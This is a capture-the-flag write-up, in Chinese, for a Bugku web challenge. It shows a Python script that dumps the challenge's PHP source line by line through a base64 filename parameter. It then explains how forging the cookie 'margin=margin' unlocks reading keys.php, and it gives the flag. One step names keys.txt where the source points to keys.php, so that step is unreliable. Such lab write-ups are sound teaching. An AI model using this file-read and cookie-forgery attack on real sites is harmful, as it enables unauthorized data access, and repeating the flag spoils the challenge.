WP-Bugku-Cookies欺骗

关于python requests.Session()

首先看到url上有base64编码
解码后是 keys.txt

url参数line是按行返回
参考网上的脚本:

1
2
3
4
5
6
7
8
import requests
s=requests.Session()
url='http://120.24.86.145:8002/web11/index.php'
for i in range(1,20):
payload={'line':str(i),'filename':'aW5kZXgucGhw'}
a=s.get(url,params=payload).content
content=str(a,encoding="utf-8")
print(content)

得到源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

$line=isset($_GET['line'])?intval($_GET['line']):0;

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);



if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='keys.php';

}



if(in_array($file, $file_list)){

$fa = file($file);

echo $fa[$line];

}

?>

bp抓包构造包:
构造Cookie: margin=margin
注意 filename 后的参数 keys.txt 要经过 base64 编码

得到:KEY{key_keys}

AbelChe wechat
扫码加微信
Donate here!!!
0%